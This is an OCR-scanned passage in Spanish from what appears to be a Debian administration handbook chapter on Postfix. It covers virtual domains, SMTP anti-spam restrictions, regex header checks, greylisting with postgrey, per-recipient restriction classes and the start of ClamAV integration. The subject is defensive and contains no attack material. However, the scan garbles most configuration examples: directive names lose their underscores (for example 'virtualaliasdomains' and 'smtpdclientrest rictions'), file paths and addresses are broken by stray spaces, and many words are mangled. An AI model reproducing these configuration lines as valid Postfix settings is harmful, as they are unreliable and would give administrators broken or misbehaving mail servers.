Certificados  SSL  de  Snake  s'n  escrupulos  en  los  viejos  tiempos  (promocionados  como  aceite  de  serpiente ,  de 
0(-^  ahf  su  nombre),  no  tienen  absolutamente  ningun  valor:  no  puede  confiar  en  ellos 
para  autenticacion  del  servidor  puesto  que  son  certificados  autofirmados  genera- 
dos  automaticamente.  No  obstante  son  utiles  para  mejorar  la  privacidad  de  los 
intercambios. 

Por  lo  general  deben  utilizarse  exclusivamente  para  pruebas  y  el  servicio  normal 
debe  utilizar  certificados  reales;  puede  generarlos  utilizado  el  procedimiento  des- 
cripto  en  la  Seccion  10.2.1.1,  «lnfraestructura  de  Have  publica:  easy-rsa»  pagina 
239. 
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11.1.2.  Configuration  de  dominios  virtuales 


El  servidor  de  correo  puede  recibir  correos  dirigidos  a  otros  dominios  distintos  del  dominio 
principal;  estos  dominios  se  conocen  como  «dominios  virtuales».  En  la  mayoria  de  los  casos 
en  los  que  es  asl,  los  correos  no  se  dirigen  en  ultima  instancia  a  los  usuarios  locales.  Postfix 
proporciona  dos  caracterfsticas  interesantes  para  gestionar  dominios  virtuales. 


ATENCION  No  se  debe  hacer  referencia  a  ninguno  de  los  dominios  virtuales  en  la  variable 
Dominios  virtuales  y  mydestination;  esta  variable  unicamente  contiene  los  nombres  de  los  dominios 
dominios  canonicos  «canonicos»  asociados  directamente  con  la  maquina  y  sus  usuarios  locales. 


Alias  de  dominio  virtual 

Un  «alias  de  dominio  virtual))  («virtual  alias  domain»)  unicamente  contiene  alias,  es  decir  direc- 
ciones  que  unicamente  reenvian  los  correos  hacia  otras  direcciones. 

Para  habilitar  un  dominio  de  este  tipo,  agregue  su  nombre  a  la  variable  virtual_alias_domains  y 
establezca  un  archivo  de  traduccion  de  direcciones  en  la  variable  virtual_alias_maps. 


Ejemplo  11.2  Directivas  a  agregar  en  el  archivo  /etc/ post  fix/ main .  cf 


virtualaliasdomains  =  falcotsbrand.com 
virtualaliasmaps  =  hash : /etc/postfix/virtual 


El  archivo  /etc/post  fix/ vi  rtual  describe  la  relacion  con  una  sintaxis  muy  sencilla:  cada  linea 
contiene  dos  campos  separados  por  espacios  en  bianco;  el  primer  campo  es  el  nombre  del  alias 
y  el  segundo  es  una  lista  de  las  direcciones  de  correo  a  las  que  se  redirigen.  La  sintaxis  especial 
@dominio.com  abarca  todos  los  alias  pertenecientes  a  un  dominio. 


Ejemplo  11.3  Archivo  /etc/ postfix/virtual  de  ejemplo 


webmaster@falcots brand . com  j  ean@f at cot . com 

contact@falcotsbrand.com  laure@falcot.com,  sophie@falcot.com 

#  El  alias  siguiente  es  generico  y  abarca  todas  las  direcciones 

#  del  dominio  falcotsbrand.com  que  no  estan  incluidas  explicitamente 

#  en  este  archivo. 

#  Estas  direcciones  reenvian  el  correo  al  usuario  con  el  mismo  nombre 

#  pero  del  dominio  falcot.com 

@falcotsbrand , com  @falcot.com 
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Casillas  de  dominio  virtual 


PRECAUCION 

^Dominio  virtual 
combinado? 


Postfix  no  permite  utilizar  el  mismo  dominio  en  virtualaliasdomains  y  virtu 
almailboxdomains.  Sin  embargo,  cada  dominio  de  virtualmailboxdomains 
es  incluido  implfcitamente  en  virtual  alias  domains  lo  que  permite  mezclar 
alias  y  casillas  en  un  dominio  virtual. 


Los  mensajes  dirigidos  a  una  casilla  de  dominio  virtual  son  almacenados  en  casillas  que  no  estan 
asignadas  a  un  usuario  local  del  sistema. 

Activar  una  casilla  de  dominio  virtual  requiere  agregar  este  dominio  en  la  variable  virtual_mail 
boxdomainsy  hacer  referencia  a  un  archivo  de  asociacion  de  casillas  en  virtual_mailbox_maps. 
El  parametro  virtual_mailbox_base  contiene  el  directorio  en  el  que  se  almacenaran  todas  las 
casillas. 

El  parametro  virtual_uid_maps  (o  virtual_gid_maps  respectivamente)  hace  referencia  al  archi¬ 
vo  que  contiene  la  asociacion  entre  las  direcciones  de  correo  y  el  usuario  de  sistema  (o  grupo 
respectivamente)  «dueno»  de  la  casilla  correspondiente.  Para  lograr  que  todas  las  casillas  per- 
tenezcan  al  mismo  usuario/ grupo,  la  sintaxis  static:5000  asigna  un  UID/GID  fijo  (aqui  el  valor 
5000). 


Ejemplo  1 1.4  Directivas  a  agregar  en  el  archivo  /etc/ post  fix/ main .  cf 


virtualmailboxdomains  =  falcot.org 
virtualmailboxmaps  =  hash : /etc/postf ix/vmailbox 
virtualmailboxbase  =  /var/mail/vhosts 


Nuevamente,  la  sintaxis  del  archivo  /etc/postf ix/vmailbox  es  bastante  directo:  dos  campos 
separados  con  espacios  en  bianco.  El  primer  campo  es  una  direccion  de  correo  en  alguno  de 
los  dominios  virtuales  y  el  segundo  campo  es  la  ubicacion  de  la  casilla  asociada  (relativa  al  di¬ 
rectorio  especificado  en  virtual_mailbox_base) .  Si  el  nombre  de  la  casilla  finaliza  con  una  barra 
(/),  se  almacenaran  los  correos  en  formato  maildir;  de  lo  contrario  se  utilizara  el  formato  mbox 
tradicional.  El  formato  maildir  utiliza  un  directorio  completo  para  almacenar  una  casilla,  cada 
mensaje  individual  es  almacenado  en  un  archivo  separado.  Por  el  otro  lado,  en  el  formato  mbox 
se  almacena  toda  la  casilla  en  un  archivo  y  cada  linea  que  comience  con  «From  (From  es  seguido 
por  un  espacio)  indica  el  comienzo  de  un  nuevo  mensaje. 
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Ejemplo  11.5  El  archivo  /etc/ postfix/ vmailbox 


#  Se  almacena  el  correo  de  Jean  como  maildir,  con 

#  un  archivo  por  correo  en  un  directorio  dedicado 
jean@falcot.org  falcot.org/jean/ 

#  Se  almacena  el  correo  de  Sophie  en  un  archivo 

#  «mbox»  tradicional  con  todos  los  correos 

#  en  un  solo  archivo 
sophie@falcot . org  falcot . org/sophie 


1 1.1.3.  Restricciones  para  recibir  y  enviar 

La  cantidad  creciente  de  correo  masivo  no  solicitado  (spam)  hace  necesario  ser  cada  vez  mas 
estricto  al  decidir  que  correos  debe  aceptar  un  servidor.  Esta  seccion  presenta  alguna  de  las 
estrategias  incluidas  en  Postfix. 


CULTURA  «Spam»  es  un  termino  generico  utilizado  para  designar  todo  el  correo  comercial 
El  problema  del  spam  no  s°hcitado  (UCE  por  su  siglas  en  ingles:  «Unsolicited  Commercial  Emails»)  que 
inundan  nuestras  casillas  electronicas;  los  individuos  sin  escrupulos  que  lo  envian 
son  conocidos  como  spammers.  Poco  les  importan  las  molestias  que  causan  ya  que 
enviar  un  correo  cuesta  muy  poco  y  solo  necesitan  atraer  con  sus  ofertas  un  por- 
centaje  muy  pequeno  de  quienes  lo  reciban  para  que  la  operacion  de  spam  genere 
mas  dinero  de  lo  que  cuesta.  El  proceso  es  mayormente  automatico  y  cualquier 
direccion  de  correo  que  sea  publicada  (por  ejemplo  en  un  foro  web,  en  los  compen- 
dios  de  una  lista  de  correo,  en  un  blog,  etc.)  sera  descubierta  por  los  robots  de  los 
spammers  y  vi'ctima  de  un  flujo  interminable  de  mensajes  no  solicitados. 

Todos  los  administradores  de  sistemas  intentan  enfrentarse  a  esta  molestia  con 
filtros  de  spam  pero,  por  supuesto,  los  spammers  continuan  adaptandose  para  evi- 
tar  estos  filtros.  Algunos  inclusive  alquilan  redes  de  maquinas  comprometidas  por 
algun  gusano  de  varios  sindicatos  criminales.  jEstadisticas  recientes  estiman  que 
hasta  un  95  %  de  todos  los  correos  circulando  en  Internet  son  spam! 


Restricciones  de  acceso  basadas  en  IP 


La  directiva  smtpd_client_restrictions  controla  que  maquinas  pueden  comunicarse  con  el  servi¬ 
dor  de  correo. 
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Ejemplo  1 1.6  Restricciones  basadas  en  l a  direction  del  cliente 


smtpdclientrest rictions  =  permitmynetworks, 
warn  if  reject  rej ectunknownclient , 
checkclientaccess  hash : /etc/postf ix/access_clientip, 
rej ect  rbl  client  sbl-xbl . spamhaus . org , 
rejectrbl  client  list.dsbl.org 


Cuando  una  variable  contiene  una  lista  de  reglas,  como  en  el  ejemplo  anterior,  estas  reglas  son 
evaluadas  en  orden  desde  la  primera  hasta  la  ultima.  Cada  regia  puede  aceptar  el  mensaje,  re- 
chazarlo  o  dejar  la  decision  de  que  hacer  a  reglas  posteriores.  Por  lo  tanto,  el  orden  importa 
y  cambiar  el  orden  en  el  que  estan  establecidas  las  reglas  puede  provocar  un  comportamiento 
completamente  diferente. 

La  directiva  permit_mynetworks,  como  primera  regia,  acepta  todos  los  correos  que  provienen 
de  equipos  en  la  red  local  (definida  por  la  variable  de  configuracion  mynetworks ). 

La  segunda  directiva  normalmente  rechazara  correos  que  provienen  de  equipos  sin  una  confi¬ 
guracion  de  DNS  completamente  valida.  Esta  configuracion  valida  significa  que  la  direccion  IP 
esta  asociada  a  un  nombre  y  que  este  nombre,  ademas,  resuelve  a  dicha  direccion  IP.  General- 
mente,  esta  restriccion  es  demasiado  estricta  ya  que  muchos  servidores  de  correo  no  tienen  un 
DNS  inverso  para  su  direccion  IP.  Esto  explica  porque  los  administradores  de  Falcot  agregaron  el 
modificador  warn_if_reject  antes  de  la  directiva  rejectunkownclient:  este  modificado  convier- 
te  el  rechazo  en  una  simple  advertencia  guardada  en  los  registros.  Los  administradores  pueden 
revisar  la  cantidad  de  mensajes  que  hubiesen  sido  rechazados  si  esta  regia  hubiese  sido  aplicada 
y  luego  tomar  decisiones  informadas  si  desean  activarla. 


SUGERENCIA  El  criterio  de  restriccion  incluye  tablas  que  pueden  ser  modificadas  por  un  admi- 
Tablas  access  nistrador  que  contienen  combinaciones  de  remitente,  direccion  IP  y  nombres  de 
equipo  permitidos  o  prohibidos.  Puede  crear  estas  tablas  desde  una  copia  descom- 
primida  del  archivo  /usr/share/doc/postfix-doc/examples/access  .gz.  Este 
modelo  esta  documentado  en  sus  comentarios,  lo  que  significa  que  cada  tabla  des¬ 
cribe  su  propia  sintaxis. 

La  tabla  /etc/postf ix/access_clientip  enumera  direcciones  IP  y  redes;  /etc/ 
postf ix/access_helo  enumera  nombres  de  dominio;  /etc/postf ix/access_ 
sender  contiene  direcciones  de  correo  de  remintentes.  Necesita  convertir  todos 
estos  archivos  en  «tablas  hash»  (un  formato  optimizado  para  acceso  rapido)  luego 
de  cada  cambio  ejecutando  postmap  /etc/postf ix/archivo. 


La  tercera  directiva  permite  al  administrador  definir  listas  negras  y  blancas  de  servidores  de 
correo,  almacenadas  en  el  archivo  /etc/postfix/access_clientip.  Se  consideran  confiables 
aquellos  servidores  en  la  lista  blanca  y,  por  lo  tanto,  sus  correos  no  pasaran  por  las  siguientes 
reglas  de  filtrado. 

Las  ultimas  dos  reglas  rechazan  cualquier  mensaje  que  provenga  de  un  servidor  incluido  en 
una  de  las  listas  negras  indicadas.  RBL  es  un  acronimo  de  Remote  Black  List  (lista  negra  remota); 
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hay  muchas  de  estas  listas  pero  todas  enumeran  servidores  mal  configurados  que  los  spammers 
utilizan  para  redirigir  sus  correos,  asi  como  equipos  que  no  siendo  servidores  de  correo  legftimos 
estan  infectados  con  algun  gusano  o  virus  y  actuan  como  tales. 


SUGERENCIA  Las  listas  negras  a  veces  incluyen  un  servidor  legi'timo  que  ha  sufrido  un  incovenien- 
Listas  blancas  y  RBLs  te.  estas  situaciones,  se  rechazaran  todos  los  correos  que  provengan  de  alguno  de 
estos  servidores  a  menos  que  el  servidor  este  incluido  en  una  lista  blanca  definida 
en  /etc/postf ix/access_clientip. 

Por  este  motivo  es  recomendable  incluir  en  la  lista  blanca  los  servidores  confiables 
desde  los  que  habitualmente  se  reciban  muchos  correos. 


Revision  de  la  validez  de  las  ordenes  EHLO  o  HELO 

Cada  intercambio  SMTP  comienza  con  la  orden  HELO  (o  EHLO)  seguida  del  nombre  del  servidor 
que  envia  el  correo;  puede  ser  interesante  validar  este  nombre. 


Ejemplo  1 1.7  Restricciones  en  el  nombre  anunciado  con  EHLO 


smtpdhelorestrictions  =  permit  my networks, 
rej  ectinvalidhostname, 

checkhelo  access  hash : /etc/postfix/access_helo, 

rej  ectnonfqdnhostname, 

warn  if  reject  rej ectunknownhostname 


La  primera  directiva  permit_my_networks  permite  que  todas  las  maquinas  en  la  red  local  se 
presenten  libremente.  Esto  es  importante  ya  que  algunos  programas  de  correo  no  respetan  esta 
parte  del  protocolo  SMTP  de  forma  suficientemente  correcta  y  pueden  presentarse  a  si  mismos 
con  nombres  sin  sentido. 

La  regia  reject_invalid_hostname  rechazalos  correos  cuando  el  anuncio  EHLO  enumere  un  nom¬ 
bre  sintacticamente  incorrecto.  La  regia  reject_non_fqdn_hostname  rechaza  mensajes  cuando  el 
nombre  anunciado  no  es  un  nombre  de  dominio  completamente  calificado  (incluye  un  nombre 
de  dominio  asi  como  tambien  el  nombre  del  equipo).  La  regia  reject_unkown_hostname  rechaza 
los  mensajes  si  el  nombre  anunciado  no  existe  en  su  DNS.  Los  administradores  hicieron  que  los 
efectos  de  esta  regia  sean  solo  una  advertencia  con  el  modificador  warn_if_reject  debido  a  que, 
lamentablemente,  genera  demasiados  rechazos.  Esto  es  solo  un  primer  paso,  pueden  decidir  eli- 
minar  el  modificador  en  el  futuro  luego  de  analizar  los  resultados  de  esta  regia. 

Utilizar  permit_mynetworks  como  la  primera  regia  tiene  un  efecto  secundario  interesante:  las 
reglas  siguientes  solo  seran  aplicadas  a  los  equipos  fuera  de  la  red  local.  Esto  permite  rechazar 
todos  los  equipos  que  se  anuncien  a  si  mismos  como  parte  de  falcot.com,  por  ejemplo  agregando 
una  linea  falcot.com  REJECT  jNo  es  parte  de  nuestra  red!  en  el  archivo  /etc/postf  ix/access_ 
helo. 
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Aceptacion  o  rechazo  basado  en  el  remitente  anunciado 

Cada  mensaje  tiene  un  remitente  anunciado  con  la  orden  MAIL  FROM  del  protocolo  SMTP;  nue- 
vamente,  puede  validar  esta  informacion  de  varias  formas. 


Ejemplo  1 1.8  Verification  de  remitente 


smtpd  senderrestrictions  = 

checksenderaccess  hash : /etc/postf ix/access_sender, 
rej ectunknownsenderdomain ,  rej ectunlis ted  sender, 
rej  ectnonfqdnsender 


La  tabla  /etc/post f  ix/access_sende  r  asocia  algun  tratamiento  especial  a  algunos  remitentes. 
Esto  generalmente  significa  enumerar  algunos  remitentes  en  una  lista  negra  o  blanca. 

La  regia  reject_unknown_sender_domain  requiere  un  remitente  con  dominio  valido,  ya  que  es 
necesario  en  una  direccion  valida.  La  regia  reject_unlisted_sender  rechaza  remitentes  locales 
si  la  direccion  no  existe;  esto  evita  que  se  envien  correos  desde  una  direccion  invalida  en  el 
dominio  falcot.com  y  los  mensajes  dejoe.bloggs@falcot.com  solo  son  aceptados  si  existe  dicha 
direccion. 

Finalmente,  la  regia  reject_non_fqdn_sender  rechaza  los  correos  que  dicen  provenir  de  direc- 
ciones  sin  un  nombre  de  dominio  completamente  calificado.  En  la  practica  significa  rechazar 
correos  que  provienen  de  usuario@equipo:  la  direccion  debe  anunciarse  como  usuario@equipo. 
example.com  o  usuario@example.com. 


Aceptacion  o  rechazo  basado  en  el  receptor 

Cada  correo  tiene  al  menos  un  receptor,  anunciado  con  la  orden  RCPT  TO  en  el  protocolo  SMTP. 
Estas  direcciones  tambien  requieren  validacion,  aun  si  pueden  ser  menos  relevantes  que  las 
verificaciones  realizadas  en  la  direccion  del  remitente. 


Ejemplo  1 1.9  Verification  de  receptor 


smtpdrecipientrest rictions  =  permitmynetworks, 

rej  ectunauthdestination ,  rej ectunlis ted  recipient , 
rej  ectnonf qdnrecipient 


reject_unauth_destination  es  la  regia  basica  que  requiere  que  los  mensajes  externos  esten  des- 
tinados  a  nosotros;  se  rechazaran  los  mensajes  que  sean  enviados  a  una  direccion  que  no  sea 
gestionada  por  este  servidor.  Sin  esta  regia,  el  servidor  se  convierte  en  una  forma  abierta  de 
reenvfo  que  permite  que  los  spammers  envien  correos  no  solicitados;  por  lo  tanto  esta  regia  es 
obligatoria  y  preferentemente  debe  estar  ubicada  cerca  del  principio  de  la  lista  para  evitar  que 
otras  reglas  autoricen  el  mensaje  antes  que  se  verifique  su  destino. 
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La  regia  reject_unlisted_recipient  rechaza  los  mensajes  enviados  a  usuarios  locales  que  no  exis- 
ten,  lo  que  tiene  sentido.  Finalmente,  la  regia  reject_non_fqdn_recipient  rechaza  direcciones 
que  no  sean  completamente  calificadas;  esto  hace  imposible  enviar  un  correo  a  jean  o  jean@ 
equipo  y  necesita,  en  cambio,  utilizar  la  direccion  completa  como  literal@equipo.falcot.com  o 
jean@falcot.com. 


Restricciones  asociadas  con  la  orden  DATA 

Se  emite  la  orden  DATA  en  SMTP  antes  del  contenido  del  mensaje.  No  provee  ninguna  informa- 
cion  en  si  misma  ademas  de  anunciar  lo  que  seguira.  Todavia  puede  ser  sujeta  a  verificacion. 


Ejemplo  11.10  Verificacion  de  DATA 


smtpd  datarestrictions  =  rej ectunauth  pipelining 


Las  directivas  reject_unauth_pipelining  causa  que  se  rechace  el  mensaje  si  el  remitente  envia 
una  orden  antes  que  se  envia  la  respuesta  a  la  orden  anterior.  Esto  previene  una  optimizacion 
comun  utilizada  por  los  robots  de  spammers  ya  que  no  tienen  el  menor  interes  en  las  respuestas 
y  solo  estan  interesados  en  enviar  tantos  correos  como  sea  posible  en  el  menor  tiempo  posible. 


Implementacion  de  restricciones 

Si  bien  las  ordenes  anteriores  validan  la  informacion  en  las  varias  etapas  del  intercambio  SMTP, 
Postfix  solo  envia  el  rechazo  en  si  como  respuesta  a  la  orden  RCPT  TO. 

Esto  significaque  aun  si  se  rechaza  el  mensaje  debido  a  una  orden  EHLO  no  valida,  Postfix  cono- 
ce  el  remitente  y  el  receptor  cuando  anuncia  un  rechazo.  Luego  puede  registrar  un  mensaje  mas 
explicito  de  lo  que  podria  si  se  hubiera  interrumpido  la  transaccion  al  comienzo.  Ademas,  una 
cantidad  de  clientes  SMTP  no  esperan  fallos  en  las  primeras  ordenes  de  SMTP  y  estos  clientes 
no  se  molestaran  tanto  por  este  rechazo  tardio. 

Una  ventaja  final  de  esta  opcion  es  que  las  reglas  pueden  acumular  informacion  durante  las 
varias  etapas  del  intercambio  SMTP;  esto  permite  definir  permisos  mas  precisos,  como  rechazar 
conexiones  remotas  si  se  anuncia  como  un  remitente  local. 


Filtros  basados  en  el  contenido  del  mensaje 

El  sistema  de  validacion  y  restriccion  no  estaria  completo  sin  una  forma  de  realizar  verificacio- 
nes  en  el  contenido  de  los  mensajes.  Postfix  diferencia  las  verificaciones  en  las  cabeceras  del 
correo  de  aquellas  sobre  el  cuerpo  del  mensaje. 
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Ejemplo  11.11  Habilitacion  defiltros  basados  en  contenido 


headerchecks  =  regexp : /etc/postf ix/header_checks 
bodychecks  =  regexp : /etc/postf ix/body_checks 


Ambos  archivos  contienen  una  lista  de  expresiones  regulares  (normalmente  conocidas  como 
regexps  o  regexes)  y  las  acciones  asociadas  que  se  deben  disparar  cuando  las  cabeceras  (o  cuerpo) 
del  mensaje  coincida  con  la  expresion. 


vista  rapida  El  arch  i  vo  /  us  r/sha  re/doc/post  fix  -  doc/examples/ headerchecks .  gz  contie- 
Tablas  de  expresiones  ne  much°s  comentarios  explicativos  y  puede  utilizarlo  como  punto  de  partida  para 
regulares  («regexp»)  crear  los  archivos  /etc/postf ix/header_checks  y  /etc/postf ix/body_checks. 


Ejemplo  11.12  Archivo  / etc/postf ix/ header_checks  de  ejemplo 


/''X-Mailer:  GOTO  Sarbacane/  REJECT  I  fight  spam  (GOTO  Sarbacane) 
/''Subject:  *Su  email  contiene  VIRUS/  DESCARTAR  notificacion  de  virus 


VOLVER  A  LOS  CIMIENTOS  El  termino  expresion  regular  (acortado  como  regexp  o  regex)  hace  referencia  a  una 
Expresiones  regulares  notacion  generica  para  expresar  una  descripcion  del  contenido  o  estructura  de  una 
cadena  de  caracteres.  Algunos  caracteres  especiales  permiten  definir  alternativas 
(por  ejemplo  f  oo  |  bar  coincidira  tanto  «foo»  como  «bar»),  conjuntos  de  caracteres 
permitidos  (por  ejemplo  [0-9]  significa  cualquier  dfgito  y  .  —  un  punto  —  significa 
cualquier  caracter),  cuantificadores  (s?  coincidira  tanto  con  s  como  con  la  cadena 
vacia,  en  otras  palabras  0  o  1  ocurrencia  de  s;  s+  coincidira  con  uno  o  mas  caracteres 
s  consecutivos,  etc.).  Los  parentesis  permiten  agrupar  resultados  de  busqueda. 

La  sintaxis  exacta  de  estas  expresiones  es  diferente  en  cada  herramienta  que  las 
utilizan,  pero  las  caracterfsticas  basicas  son  similares. 

•-  http://es .Wikipedia . org/wiki/Expresionregular 


El  primero  revisa  la  cabecera  que  menciona  el  software  de  correo;  si  es  GOTO  Sarbacane  (un 
software  en  correo  masivo),  el  mensaje  es  rechazado.  La  segunda  expresion  revisa  el  asunto  del 
mensaje;  si  menciona  una  notificacion  de  virus  podemos  decidir  no  rechazar  el  mensaje  sino,  en 
cambio,  descartarlo  inmediatamente. 

Utilizar  estos  filtros  es  un  arma  de  doble  filo  ya  que  es  sencillo  crear  reglas  demasiado  genericas 
y,  en  consecuencia,  perder  correos  legitimos.  En  estos  casos,  no  solo  se  perderan  los  mensajes 
sino  que  sus  remitentes  recibiran  mensajes  de  error  no  deseados  (y  molestos). 
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1 1.1.4.  Configuration  de  « I istas  grises»  ( greyiisting ) 

Las  «listas  grises»  («greylisting»)  son  una  tecnica  de  filtrado  en  la  que,  inicialmente,  el  mensaje 
se  rechaza  con  un  codigo  de  error  temporal,  y  solo  es  aceptado  en  un  intento  posterior  tras  cierta 
demora.  Este  filtro  es  particularmente  eficiente  contra  el  spam  enviado  por  maquinas  infectadas 
con  gusanos  y  virus,  ya  que  estos  rara  vez  actuan  como  agentes  SMTP  completos  (revisando  el 
codigo  de  error  y  reintentando  luego  mensajes  fallidos),  especialmente  debido  a  que  muchas  de 
las  direcciones  recolectadas  son  invalidas  y  reintentarlas  solo  seria  una  perdida  de  tiempo. 

Postfix  no  provee  listas  grises  de  forma  nativa,  pero  posee  una  funcionalidad  en  la  que  la  decision 
de  aceptar  o  rechazar  un  mensaje  dado  puede  ser  delegada  a  un  programa  externo.  El  paquete 
postgrey  contiene  dicho  programa,  disenado  para  interactuar  con  su  servicio  de  delegacion  de 
pollticas  de  acceso. 

Una  vez  que  instalo  postgrey,  este  se  ejecutara  como  un  demonio  que  escucha  en  el  puerto  10023. 
Luego  puede  configurar  postfix  para  utilizarlo  si  agrega  el  parametro  c h ec k_po I i cy  se rv ice  como 
una  restriccion  adicional: 

smtpdrecipientrest rictions  =  permitmynetworks, 

[.  .  .] 

check  policyservice  inet : 127 .0.0.1: 10023 

Cada  vez  que  Postfix  alcance  esta  regia,  se  conectara  con  el  demonio  postgrey  y  le  enviara  la 
information  del  mensaje  en  cuestion.  Por  su  parte,  Postgrey  considerara  la  terna  compuesta 
por  la  direccion  IP,  el  remitente  y  el  receptor  y  revisara  en  su  base  de  datos  si  esta  fue  intentada 
recientemente.  En  caso  que  asi  sea,  Postgrey  respondera  que  el  mensaje  debe  ser  aceptado;  de  lo 
contrario,  la  respuesta  indicara  que  el  mensaje  debera  ser  rechazado  temporalmente  y  agregara 
la  terna  a  su  base  de  datos. 

La  principal  desventaja  de  las  listas  grises  es  que  demorara  mensajes  legitimos,  lo  que  no  siempre 
es  aceptable.  Tambien  aumenta  la  carga  en  los  servidores  que  envfan  muchos  correos  legitimos. 


EN  LA  PRACTICA  En  teori'a,  las  listas  grises  solo  deberian  demorar  el  primer  correo  de  un  remitente  a 

Desventajas  de  las  listas  un  recept°r  particular,  y  la  demora  tipica  es  del  orden  de  minutos.  La  realidad,  sin 

grises  embargo,  puede  ser  ligeramente  diferente.  Algunos  ISPs  grandes  utilizan  conjuntos 
de  servidores  SMTP  y,  cuando  el  mensaje  es  rechazado  inicialmente,  el  servidor 
que  lo  reintente  puede  no  ser  el  mismo  que  el  que  envio  el  mensaje  inicial.  Cuando 
ocurre  esto,  el  segundo  servidor  tambien  recibira  un  error  temporal  debido  a  la  lista 
gris  y  asi  sucesivamente;  puede  tomar  varias  horas  hasta  que  la  transmision  sea 
intentada  por  un  servidor  que  ya  estuvo  involucrado  ya  que  los  servidores  SMTP 
generalmente  aumentan  la  demora  entre  intentos  cuando  estos  fallan. 

Como  consecuencia,  la  direccion  IP  puede  cambiar  en  el  tiempo  aun  para  un  remi¬ 
tente  particular.  Pero  hay  mas:  la  direccion  del  remitente  tambien  puede  cambiar. 
Por  ejemplo,  muchos  servidores  de  listas  de  correo  codifican  informacion  extra  en 
la  direccion  del  remitente  para  poder  gestionar  mensajes  de  error  (conocidos  como 
«bounces»).  Luego,  puede  que  cada  nuevo  mensaje  enviado  a  una  lista  de  correo 
necesite  pasar  por  las  listas  grises,  lo  que  significa  que  debe  ser  almacenado  (tem¬ 
poralmente)  en  el  servidor  del  remitente.  Para  listas  de  correo  muy  grandes  (con 
decenas  de  miles  de  suscriptos),  esto  puede  convertirse  en  un  problema  rapidamen- 
te. 
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Para  mitigar  estas  desventajas,  Postgrey  gestiona  listas  blancas  de  estos  sitios  y 
los  mensajes  que  provengan  desde  ellos  son  aceptados  inmediatamente  sin  pasar 
a  traves  de  las  listas  grises.  Puede  adaptar  esta  lista  facilmente  a  sus  necesidades 
locales  ya  que  se  encuentra  almacenada  en  el  archivo  /etc/postg  rey/whitelist_ 
clients. 


YENDO  MAS  ALLA  Tambien  puede  evitar  los  inconvenientes  de  las  listas  grises  utilizandolas  unicamen- 
Listas  grises  selectivas  te  Para  subconjunto  de  clientes  que  ya  son  considerados  como  fuentes  probables 

con  mi  Iter-grey  list  de  sPam  (porque  se  encuentran  en  una  lista  negra  de  DNS).  Esto  no  es  posible  con 
postgrey,  pero  puede  utilizar  mi  Iter-grey  list  para  hacer  esto. 

En  este  escenario,  debido  a  que  una  lista  negra  de  DNS  nunca  genera  un  rechazo 
definitivo,  es  razonable  utilizar  listas  negras  de  DNS  agresivas,  incluyendo  aquellas 
que  incluyen  todas  las  direcciones  IP  dinamicas  de  clientes  de  ISPs  (como  pbl .  spa 
mhaus.orgodul.dnsbl. sorbs,  net). 

Como  milter-greylist  utiliza  la  interfaz  de  milter  de  Sendmail,  la  configura- 
cion  del  lado  de  postfix  se  limita  a  «smtpd_milters  =unix:/var/run/milter~ 
greylist/milter-g reylist .  sock».  La  pagina  de  manual  greylist .  conf  (5 ) 
documenta  /etc/milter- greylist/greylist . conf  y  las  muchas  formas  de 
configurar  milter-greylist.  Debera  tambien  editar  el  archivo  /etc/default/ 
milter-greylist  para  activar  realmente  el  servicio. 


11.1.5.  Personalizacion  de  filtros  basados  en  el  receptor 


Seccion  11.1.3,  «Restricciones  para  recibir  y  enviar»  pagina  274  y  Seccion  11.1.4,  «Configuracion 
de  «listas  grises»  ( greylisting)»  pagina  280  revisaron  muchas  de  las  restricciones  posibles.  Todas 
son  utiles  para  limitar  la  cantidad  de  spam  recibido,  pero  tambien  tienen  su  desventajas.  Por 
lo  tanto,  es  mas  y  mas  comun,  personalizar  el  conjunto  de  filtros  segun  el  receptor.  En  Falcot 
Corp,  las  listas  grises  son  interesantes  para  la  mayoria  de  los  usuarios  pero  entorpece  el  trabajo 
de  algunos  usuarios  que  necesitan  una  latencia  baja  en  sus  correos  (como  el  servicio  de  soporte 
tecnico).  De  forma  similar,  el  servicio  comercial  a  veces  tiene  problemas  para  recibir  correos 
de  algunos  proveedores  asiaticos  que  pueden  encontrarse  en  listas  negras;  este  servicio  solicito 
una  direccion  sin  filtros  para  poder  intercambiar  correspondencia. 

Postfix  provee  tal  personalizacion  de  filtros  con  el  concepto  de  «clases  de  restriccion».  Declarara 
las  clases  en  el  parametro  smtpdrestrictionclasses  de  la  misma  forma  que  smtpd  recipient  r 
estrictions.  La  directiva  checkrecipientaccess  define  luego  una  tabla  que  asocia  un  receptor 
dado  con  el  conjunto  de  restricciones  apropiadas. 


Capitulo  11  —  Servicios  de  red:  Postfix,  Apache,  NFS,  Samba,  Squid,  LDAP,  SIP,  XMPP,  TURN 


281 


Ejemplo  11.13  Definition  de  closes  de  restriction  en  main,  cf 


smtpdrestrictionclasses  =  greylisting,  aggressive,  permissive 

greylisting  =  checkpolicy  service  inet : 127 . 0 . 0 . 1 : 10023 
aggressive  =  rej ectrblclient  sbl-xbl.spamhaus.org, 
checkpolicy  service  inet : 127 .0.0.1: 10023 
permissive  =  permit 

smtpdrecipientrest rictions  =  permitmynetworks, 
rej  ectunauthdestination , 

checkrecipient  access  hash : /etc/postfix/ recipient  access 


Ejemplo  11.14  El  archivo  /etc/ postfix/  recipient_access 


#  Direcciones  sin  filtro 
postmaster@falcot.com  permissive 
support@falcot.com  permissive 
sales-asia@falcot.com  permissive 

#  Filtros  agresivos  para  algunos  usuarios  privilegiados 

joe@falcot.com  aggressive 

#  Regia  especial  para  el  administ rador  de  la  lista  de  correos 

sympa@falcot . com  rejectunverifiedsender 

#  Listas  grises  de  forma  predeterminada 

falcot.com  greylisting 


11.1.6.  Integracion  con  un  antivirus 

La  cantidad  de  virus  circulando  como  adjuntos  de  correos  hace  importante  configurar  un  anti¬ 
virus  en  el  punto  de  entrada  de  la  red  corporativa,  ya  que  a  pesar  de  una  campana  de  concienti- 
zacion,  algunos  usuarios  aun  abriran  los  adjuntos  de  mensajes  obviamente  sospechosos. 

Los  administradores  de  Falcot  seleccionaro  clamav  como  su  antivirus  libre.  El  paquete  principal 
es  clamav,  pero  tambien  instalaron  algunos  paquetes  adicionales  como  atj,  unzoo,  unrar  y  lha  ya 
que  son  necesarios  para  que  el  antivirus  analice  archivos  adjuntos  en  alguno  de  estos  formatos. 

La  tarea  de  interactuar  entre  el  antivirus  y  el  servidor  de  correo  le  corresponde  a  clamav - 
milter.  Un  «milter»  (apocope  de  «filtro  de  correo»:  «mail  filter»)  es  un  programa  de  filtrado 
disenado  especialmente  para  interactuar  con  servidores  de  correo.  Un  milter  utiliza  una  inter- 
faz  de  programacion  de  aplicaciones  (API:  «Application  Programming  Interface)))  que  provee  un 
